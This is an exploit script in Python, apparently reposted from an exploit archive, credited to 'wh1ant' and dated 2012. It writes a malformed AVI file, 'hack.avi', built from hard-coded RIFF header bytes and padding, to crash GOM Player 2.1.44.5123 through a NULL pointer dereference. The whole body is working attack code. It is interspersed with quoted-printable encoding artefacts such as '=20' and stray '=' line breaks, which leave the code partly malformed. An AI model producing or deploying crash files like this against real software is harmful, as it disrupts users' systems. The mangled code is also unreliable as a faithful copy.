扫码分享
验证:
体验盒子# Exploit Title: gom player 2.1.44.5123 (Unicode) NULL pointer dereference =
vulnerability
# Date: 2012.10.09
# Exploit Author: wh1ant
# Software Link: http://app.gomtv.com/gom/GOMPLAYERSETUP.EXE
# Version: 2.1.44.5123 (Unicode)
# Tested on: windows 7 Ultimate k
# Language : python
f = open("hack.avi", "wb")
data ="\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
" \
"\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" =
\
"\x6b\x04\x01\x00\x9c\x5e\x07\x00\x00\x00\x00\x00\x10\x08\x00\x00" =
\
"\x1e\x0a\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xe1\x52\x01\x00" =
\
"\x40\x01\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
"\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x49\x53\x54\x74\x00\x00\x00" =
\
"\x73\x74\x72\x6c\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73" =
\
"\x74\x73\x63\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
"\x01\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x1e\x0a\x00\x00" =
\
"\xe1\x52\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
=20
f.write(data)
for i in range(0, 0x71a):
f.write("\x00")
data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
x3d\x4c\x00"
f.write(data)
#for i in range(0, 0x41):
for i in range(0, 0x41):
f.write("\x41")
=20
for i in range(0, 0x41):
f.write("\x00")
=20
#for i in range(0, 0x41):
for i in range(0, 0x41):
f.write("\x41")
=20
f.write("\x69\x64\x78\x31\xe0\xa1")
f.close()
体验盒子
